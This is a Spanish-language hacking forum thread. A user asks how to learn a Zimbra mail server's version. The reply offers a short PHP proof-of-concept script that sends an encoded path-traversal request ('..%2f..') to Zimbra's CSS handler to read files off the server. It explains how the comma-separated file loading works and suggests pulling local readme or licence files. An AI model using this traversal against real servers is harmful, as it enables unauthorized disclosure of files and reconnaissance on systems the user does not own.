Foro de elhacker.net

Hola, bueno queria saber si hay alguna forma de averiguar la version de un Zimbra..

Saludos

Hola, viendo el código fuente y esas cosas desde el demo de la web oficial no pude encontrar nada como para poder saber la versión de zimbra que está corriendo el servidor pero encontré un bug que al parecer es file disclosure pero no estoy seguro asi que hize un script:

<?php
/* Archivo a visualizar */
$archivo = '/img/startup/ImgCalendarApp.gif';
$zimbra_url = 'http://www.testzimbra.com/zimbra/';
/* Solicitud */
$buffer = file_get_contents($zimbra_url.'css/ind/..%2f..'.str_replace('/', '%2f', $archivo).'?debug=1');
/* Imprime el contenido */
echo nl2br(htmlspecialchars($buffer, ENT_QUOTES));
?>

Lo que pasa es que cuando haces una peticion GET al directorio CSS lo que haces es llamar a un módulo que se encarga de abrir y mostrar archivos ya que puedes incluir múltiples cosas tal como se muestra en la inclusión de la hoja de estilo:

<link
 rel="stylesheet"
 type="text/css" href="/zimbra/css/common,login,zhtml,skin.css?skin=beach&v=091213032217"
>

Cada coma es un nombre de archivo diferente y la extensión es común para todos y el valor al azar de la variable es para evitar el caché, asi que puedes llamar archivos pero no se como funcione bien ese servidor WEB pero ojala te sirva. Talves puedas encontrar archivos locales como el readme o licence o docs de ayuda internos que muestren algún valor de la versión.